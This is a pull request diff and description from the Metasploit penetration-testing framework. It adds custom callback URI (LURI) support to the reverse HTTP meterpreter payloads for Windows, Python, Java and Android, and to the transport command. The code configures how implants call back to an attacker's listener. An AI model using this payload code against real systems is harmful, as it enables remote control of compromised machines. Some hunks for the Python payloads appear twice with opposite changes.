### PR TITLE
LURI stageless support for Windows and Python, and LURI support in Java and Android

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -144,7 +144,7 @@ module ReverseHttp
       end
     end
 
-    l
+    l.dup
   end
 
   # Create an HTTP listener
@@ -269,7 +269,7 @@ protected
       conn_id = conn_id[0...-1] if conn_id[-1] == '/'
     end
 
-    request_summary = "#{conn_id} with UA '#{req.headers['User-Agent']}'"
+    request_summary = "#{luri}#{req.relative_resource} with UA '#{req.headers['User-Agent']}'"
 
     # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
     if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]

--- a/lib/msf/core/payload/python/reverse_http.rb
+++ b/lib/msf/core/payload/python/reverse_http.rb
@@ -48,7 +48,7 @@ module Payload::Python::ReverseHttp
 
     target_url << ':'
     target_url << opts[:port].to_s
-    target_url << datastore['LURI']
+    target_url << luri
     target_url << generate_callback_uri(opts)
     target_url
   end
@@ -57,7 +57,7 @@ module Payload::Python::ReverseHttp
   # Return the longest URI that fits into our available space
   #
   def generate_callback_uri(opts={})
-    uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
 
     # Generate the short default URL if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space

--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -50,7 +50,7 @@ module Msf::Payload::TransportConfig
     unless uri
       type = opts[:stageless] == true ? :init_connect : :connect
       sum = uri_checksum_lookup(type)
-      uri = generate_uri_uuid(sum, opts[:uuid])
+      uri = luri + generate_uri_uuid(sum, opts[:uuid])
     end
 
     {

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,7 +51,7 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = datastore['LURI'] + generate_uri
+      conf[:url]        = luri + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -61,7 +61,7 @@ module Payload::Windows::ReverseHttp
       conf[:proxy_type] = datastore['PayloadProxyType']
     else
       # Otherwise default to small URIs
-      conf[:url]        = generate_small_uri
+      conf[:url]        = luri + generate_small_uri
     end
 
     generate_reverse_http(conf)
@@ -98,7 +98,7 @@ module Payload::Windows::ReverseHttp
 
     # Choose a random URI length between 30 and 255 bytes
     if uri_req_len == 0
-      uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
+      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     end
 
     if uri_req_len < 5

--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -55,7 +55,7 @@ module Payload::Windows::ReverseHttp_x64
 
     # add extended options if we do have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = datastore['LURI'] + generate_uri
+      conf[:url]        = luri + generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -65,7 +65,7 @@ module Payload::Windows::ReverseHttp_x64
       conf[:proxy_type] = datastore['PayloadProxyType']
      else
       # Otherwise default to small URIs
-      conf[:url]        = generate_small_uri
+      conf[:url]        = luri + generate_small_uri
     end
 
     generate_reverse_http(conf)
@@ -96,7 +96,7 @@ module Payload::Windows::ReverseHttp_x64
 
     # Choose a random URI length between 30 and 255 bytes
     if uri_req_len == 0
-      uri_req_len = 30 + datastore['LURI'].length + rand(256-(30+datastore['LURI'].length))
+      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
 
     end
 

--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -644,6 +644,16 @@ class ClientCore < Extension
     scheme = opts[:transport].split('_')[1]
     url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
 
+    if opts[:luri] && opts[:luri].length > 0
+      if opts[:luri][0] != '/'
+        url << '/'
+      end
+      url << opts[:luri]
+      if url[-1] == '/'
+        url = url[0...-1]
+      end
+    end
+
     if opts[:comm_timeout]
       request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
     end

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -575,6 +575,7 @@ class Console::CommandDispatcher::Core
     '-p'  => [ true,  'LPORT parameter' ],
     '-i'  => [ true,  'Specify transport by index (currently supported: remove)' ],
     '-u'  => [ true,  'Custom URI for HTTP/S transports (used when removing transports)' ],
+    '-lu' => [ true,  'Local URI for HTTP/S transports (used when adding/changing transports with a custom LURI)' ],
     '-ua' => [ true,  'User agent for HTTP/S transports (optional)' ],
     '-ph' => [ true,  'Proxy host for HTTP/S transports (optional)' ],
     '-pp' => [ true,  'Proxy port for HTTP/S transports (optional)' ],
@@ -656,6 +657,8 @@ class Console::CommandDispatcher::Core
         opts[:uri] = val
       when '-i'
         transport_index = val.to_i
+      when '-lu'
+        opts[:luri] = val
       when '-ph'
         opts[:proxy_host] = val
       when '-pp'

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -35,7 +35,7 @@ module Metasploit4
   def generate_reverse_http(opts={})
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url: generate_callback_url(opts),
+      http_url:        luri + generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -35,7 +35,7 @@ module Metasploit4
   def generate_reverse_http(opts={})
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url:        luri + generate_callback_url(opts),
+      http_url:        generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -36,7 +36,7 @@ module Metasploit4
     opts[:scheme] = 'https'
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url:        luri + generate_callback_url(opts),
+      http_url:        generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -36,7 +36,7 @@ module Metasploit4
     opts[:scheme] = 'https'
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url: generate_callback_url(opts),
+      http_url:        luri + generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -30,13 +30,13 @@ module Metasploit3
 
   def generate_jar(opts={})
     # Default URL length is 30-256 bytes
-    uri_req_len = 30 + rand(256-30)
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
     if self.available_space.nil?
       uri_req_len = 5
     end
 
-    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}/"
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 

--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -41,7 +41,7 @@ module Metasploit3
 
   def config
     # Default URL length is 30-256 bytes
-    uri_req_len = 30 + rand(256-30)
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
 
     # Generate the short default URL if we don't know available space
     if self.available_space.nil?
@@ -53,7 +53,7 @@ module Metasploit3
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/"
+    c << "#{luri}/"
     c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
     c << "\n"
 


### PR DESCRIPTION
This PR contains a bunch of stuff that makes the LURI stuff work in other cases. Changes include:

* Support for Android and Java payloads.
* Support for stageless Windows and Python payloads.
* Support for the `transport [add|change]` commands (adding the `-lu` parameter).
* A few code tidies (including adding the `luri` property to the handler).

I tested this mostly on Windows, so other testing on Java and Python would be appreciated. Thanks for your efforts so far!